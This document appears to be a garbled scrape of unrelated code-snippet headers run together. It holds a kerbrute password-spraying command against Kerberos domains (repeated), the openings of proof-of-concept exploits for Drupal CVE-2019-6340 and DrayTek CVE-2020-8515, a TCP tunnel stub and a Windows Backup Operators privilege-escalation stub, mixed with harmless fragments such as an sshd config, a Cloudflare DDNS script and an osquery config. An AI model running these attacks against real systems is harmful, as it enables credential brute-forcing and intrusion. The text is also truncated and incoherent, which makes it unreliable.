With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/usr/bin/env python3 | |
# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC | |
# 2019 @leonjza | |
# Technical details for this exploit is available at: | |
# https://www.drupal.org/sa-core-2019-003 | |
# https://www.ambionics.io/blog/drupal8-rce | |
# https://twitter.com/jcran/status/1099206271901798400 |
default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam' | |
default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes' | |
default['sshd']['sshd_config']['PasswordAuthentication'] = 'no' |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
Armis released new information about the vulnerabilities scope. The vulnerabilities impact more RTOS than expected.
This is a bash script to act as a Cloudflare DDNS client, useful replacement for ddclient.
cfupdater
files to /usr/local/bin
chmod +x /usr/local/bin/cfupdater
/etc/systemd/system/
, the cfupdate.service
is shown as an example.cfupdate.timer
is shown as an example.sudo systemctl enable cfupdate.timer
sudo systemctl start cfupdate.timer
package main | |
/* | |
CVE-2020-8515: DrayTek pre-auth remote root RCE | |
Mon Mar 30 2020 - 0xsha.io | |
Affected: |
from __future__ import print_function | |
import pickle | |
import os.path | |
from googleapiclient.discovery import build | |
from google_auth_oauthlib.flow import InstalledAppFlow | |
from google.auth.transport.requests import Request | |
from apiclient import errors | |
import re | |
from bs4 import BeautifulSoup as Soup |
using System; | |
using System.Net.Sockets; | |
using System.Net; | |
namespace DnsTunnel | |
{ | |
class Program | |
{ | |
static void OpenTunnel(int listenerPort, string targetHost, int targetPort) | |
{ |
//https://decoder.cloud/2018/02/12/the-power-of-backup-operatos/ | |
//https://github.com/decoder-it/BadBackupOperator/blob/master/SuBackup/SuBackup/SuBackup.cpp | |
//https://docs.microsoft.com/en-us/windows/win32/services/writing-a-servicemain-function | |
//https://docs.microsoft.com/en-us/windows/win32/vds/loading-vds | |
//Replace system command with your code. If DewIt() does not run, check if the vds service is running, it should be on-demand. | |
#define UNICODE | |
#include <windows.h> | |
#include <stdio.h> | |
#include <Psapi.h> |
{ | |
"options": { | |
"logger_snapshot_event_type": "true", | |
"schedule_splay_percent": 10 | |
}, | |
"platform": "darwin", | |
"schedule": { | |
"authorized_keys": { | |
"query": "SELECT * FROM users CROSS JOIN authorized_keys USING (uid);", |